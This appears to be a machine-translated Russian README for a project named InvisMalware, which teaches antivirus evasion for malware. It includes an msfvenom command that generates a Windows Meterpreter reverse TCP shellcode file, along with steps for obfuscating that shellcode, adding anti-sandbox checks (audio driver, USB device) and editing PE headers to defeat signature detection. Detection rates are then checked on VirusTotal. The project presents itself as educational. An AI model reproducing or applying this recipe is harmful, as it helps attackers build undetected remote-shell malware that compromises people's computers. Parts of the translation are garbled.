InvisMalware

1. Введение
2. Функции
3. Установка
4. Использование
5. Методология эксперимента
6. Тестирование
7. Внося
8. Лицензия

Invismalware - это проект, предназначенный для демонстрации передовых методов уклонения от вредоносных программ, которые обходят обнаружение антивируса. Этот эксперимент по вредоносному программам, управляемую исследованиями, фокусируется на использовании методов запутывания, таких как модификации кода и стратегии анти-сандбокс, чтобы уклониться от статического и динамического обнаружения вредоносных программ.

Этот проект предназначен только для образовательных целей , предназначенный для того, чтобы дать представление о современных стратегиях обороны вредоносных программ путем изучения методов уклонения, используемых злонамеренными субъектами.

• Генерация ShellCode : Создайте пользовательские обратные полезные нагрузки оболочки TCP с использованием MSFvenom.
• Запутывание кода : измените код вредоносного ПО, чтобы уклониться от обнаружения антивируса, добавляя NOPS, манипулируя заголовками PE и многое другое.
• Антидинамический анализ : включайте проверки для обнаружения среда песочниц, таких как аудио драйвер и присутствие устройства USB.
• Манипуляция с заголовком PE : замаскировать вредоносное ПО, настраивая портативный руководитель (PE) заголовок, чтобы избежать обнаружения на основе подписи.
• Расчет скорости уклонения : измерьте эффективность методов уклонения, сравнивая результаты по различным антивирусным двигателям.

Чтобы начать, клонируйте репозиторий и установите необходимые зависимости.

• Python 3.x
• VirtualBox/VMware (для тестирования в виртуальных средах)
• Metasploit Framework (для генерации SheltCode)
• PE-bear (для манипуляции с заголовком PE)

git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware

pip install -r requirements.txt

Используйте MSFVVENOM для генерации оборудования обратного TCP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c

Измените файл evilexp.c , чтобы запутать код и избежать обнаружения.

Развернуть вредоносное ПО в безопасной изолированной виртуальной машине, чтобы проверить ее поведение и измерения скорости обнаружения.

Загрузите вредоносное ПО в virustotal, чтобы оценить его скорость уклонения по нескольким антивирусным двигателям.

Проект следует четырехэтапной методологии для достижения уклонения от вредоносных программ:

1. Генерация ShellCode : создать базовый обратный оборудование.
2. Модификация кода : запутывайте шелл, чтобы уклониться от обнаружения.
3. Антидинамический анализ : добавьте обнаружение песочницы в инструменты обхода динамического анализа.
4. Модификация заголовка PE : измените заголовок PE, чтобы еще больше запутать подпись вредоносного ПО.

Запустите вредоносное ПО на вашей виртуальной машине, оснащенной антивирусным программным обеспечением, таким как Kaspersky , Windows Defender или BitDefender .

Загрузите модифицированное вредоносное ПО для вирустотального и проверьте, сколько антивирусных двигателей успешно его обнаруживают.

Мы приветствуем вклад в улучшение проекта. Если вы хотите внести свой вклад:

1. Вилка репозитория.
2. Создайте новую ветку для вашей функции или исправления ошибок.
3. Отправьте запрос на привлечение с подробной информацией о ваших изменениях.

Этот проект лицензирован по лицензии MIT. Смотрите файл лицензии для получения подробной информации.